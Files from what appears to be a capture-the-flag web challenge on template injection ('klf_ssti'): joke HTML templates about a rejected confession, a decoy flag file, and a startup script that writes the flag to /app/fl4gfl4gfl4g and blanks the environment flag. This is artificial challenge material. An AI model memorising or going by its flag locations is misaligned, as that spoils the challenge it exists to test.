2 | 3 |

给女神表白,被拒绝了,女神骂我klf,呜呜呜

4 |

klf是什么意思啊,呜呜呜女神肯定不会骂我的,klf是keep in Love嘛

5 |

肯定是这样的呜呜呜,女神肯定不会骂我的

6 | 7 | 8 | g 9 | 10 | 11 | -------------------------------------------------------------------------------- /Web/klf_ssti/hello/ssti/templates/klf.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | klf 6 | 7 | 8 |

klf别想

9 | 10 | g 11 | 12 | -------------------------------------------------------------------------------- /Web/klf_ssti/hello/ssti/thisfaklg: -------------------------------------------------------------------------------- 1 | fl4g不在这哦 2 | -------------------------------------------------------------------------------- /Web/klf_ssti/replace.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo $geek_flag >>/app/fl4gfl4gfl4g 3 | 4 | export GZCTF_FLAG=not_flag 5 | GZCTF_FLAG=not_flag 6 | 7 | python /app/hello/ssti/app.py 8 | --------------------------------------------------------------------------------